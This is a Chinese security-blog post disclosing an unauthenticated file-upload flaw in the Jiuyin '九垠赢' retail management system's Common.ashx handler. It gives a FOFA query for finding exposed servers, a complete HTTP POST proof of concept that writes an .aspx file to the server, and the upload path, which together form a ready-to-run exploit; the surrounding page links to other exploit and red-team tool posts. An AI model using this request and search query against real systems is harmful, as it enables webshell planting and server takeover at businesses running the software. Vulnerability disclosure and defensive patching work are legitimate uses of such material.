九垠赢商业管理系统Common.ashx存在文件上传漏洞

07015

九垠赢商业管理系统Common.ashx存在文件上传漏洞

成都和力九垠科技有限公司成立于1999年,是一家专业从事零售业全流程解决方案的高科技公司,总部位于四川成都。多年来,九垠软件不忘初衷,一直致力于中国零售企业的成长与发展,为广大客户提供优秀的零售商业管理软件与优质的金牌售后服务。经过多年的积累与发展,九垠科技已成为中国零售企业管理信息化的领导品牌。

九垠赢+商业管理系统 Common.ashx 存在文件上传漏洞,未经身份攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个 web 服务器。

fofa

"九垠赢"
图片[1]-九垠赢商业管理系统Common.ashx存在文件上传漏洞-李白你好

poc

POST /System/Common.ashx?type=savefile&path=test.aspx HTTP/1.1
Host: 
User-Agent:Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
Content-Type: multipart/form-data; boundary=WebKitFormBoundaryHHaZAYecVOf5sfa6

--WebKitFormBoundaryHHaZAYecVOf5sfa6
Content-Disposition: form-data; name="content";
Content-Type: text/plain

testupload
--WebKitFormBoundaryHHaZAYecVOf5sfa6--
图片[2]-九垠赢商业管理系统Common.ashx存在文件上传漏洞-李白你好

上传位置

/System/test.aspx
图片[3]-九垠赢商业管理系统Common.ashx存在文件上传漏洞-李白你好
© 版权声明
文章版权归作者所有,转载请标明出处。
THE END
漏洞情报
# 九垠科技
喜欢就支持一下吧
点赞15 分享
李白的头像-李白你好永久会员
李白你好VIP社区-网络安全情报攻防站介绍【请耐心看完】-李白你好
李白你好VIP社区-网络安全情报攻防站介绍【请耐心看完】
李白你好VIP社区-网络安全情报攻防站介绍【请耐心看完】
2个月前 1753
Vshell-listens-李白你好
Vshell-listens
Vshell-listens
9个月前 1175
证书列表【包下证系列】-李白你好
证书列表【包下证系列】
证书列表【包下证系列】
2个月前 1064
2025渗透攻防相关工具集合-李白你好
2025渗透攻防相关工具集合
2025渗透攻防相关工具集合
3个月前 757
红队武器库漏洞利用工具合集整理-李白你好
红队武器库漏洞利用工具合集整理
红队武器库漏洞利用工具合集整理
8个月前 621
【涉我威胁预警】河南某教育科技有限公司涉嫌数据泄露-李白你好
【涉我威胁预警】河南某教育科技有限公司涉嫌数据泄露
【涉我威胁预警】河南某教育科技有限公司涉嫌数据泄露
1个月前 577
相关推荐
全量漏洞文库新增漏洞-2025.03.18-李白你好
全量漏洞文库新增漏洞-2025.03.18
全量漏洞文库新增漏洞-2025.03.18
1个月前 203
Apache Tomcat 远程代码执行漏洞批量检测脚本(CVE-2025-24813)-李白你好
Apache Tomcat 远程代码执行漏洞批量检测脚本(CVE-2025-24813)
Apache Tomcat 远程代码执行漏洞批量检测脚本(CVE-2025-24813)
1个月前 201
安恒明御安全网关net_dynamic_pop_adv_submit存在任意文件上传漏洞-李白你好
安恒明御安全网关net_dynamic_pop_adv_submit存在任意文件上传漏洞
安恒明御安全网关net_dynamic_pop_adv_submit存在任意文件上传漏洞
1个月前 182
Ollama未授权访问漏洞(CNVD-2025-04094)-李白你好
Ollama未授权访问漏洞(CNVD-2025-04094)
Ollama未授权访问漏洞(CNVD-2025-04094)
1个月前 175
Guns后台任意文件上传漏洞-李白你好
Guns后台任意文件上传漏洞
Guns后台任意文件上传漏洞
3个月前 152
全量漏洞文库新增漏洞-2025.02.27-李白你好
全量漏洞文库新增漏洞-2025.02.27
全量漏洞文库新增漏洞-2025.02.27
2个月前 136
全量漏洞文库新增漏洞-2025.03.09-李白你好
全量漏洞文库新增漏洞-2025.03.09
全量漏洞文库新增漏洞-2025.03.09
1个月前 134
Vite开发服务器任意文件读取漏洞(CVE-2025-30208)-李白你好
Vite开发服务器任意文件读取漏洞(CVE-2025-30208)
Vite开发服务器任意文件读取漏洞(CVE-2025-30208)
1个月前 128
评论 抢沙发
头像
欢迎您留下宝贵的见解!
提交
头像

昵称

取消
昵称

请填写用户信息:

  • 昵称(必填)
  • 邮箱(必填)
表情
[aoman][baiyan][bishi][bizui][cahan][ciya][dabing][daku][deyi][doge][fadai][fanu][fendou][ganga][guzhang][haixiu][hanxiao][zuohengheng][zhuakuang][zhouma][zhemo][zhayanjian][zaijian][yun][youhengheng][yiwen][yinxian][xu][xieyanxiao][xiaoku][xiaojiujie][xia][wunai][wozuimei][weixiao][weiqu][tuosai][tu][touxiao][tiaopi][shui][se][saorao][qiudale][qinqin][qiaoda][piezui][penxue][nanguo][liulei][liuhan][lenghan][leiben][kun][kuaikule][ku][koubi][kelian][keai][jingya][jingxi][jingkong][jie][huaixiao][haqian][aini][OK][qiang][quantou][shengli][woshou][gouyin][baoquan][aixin][bangbangtang][xiaoyanger][xigua][hexie][pijiu][lanqiu][juhua][hecai][haobang][caidao][baojin][chi][dan][kulou][shuai][shouqiang][yangtuo][youling]
代码

请输入代码:

确认
图片

    暂无评论内容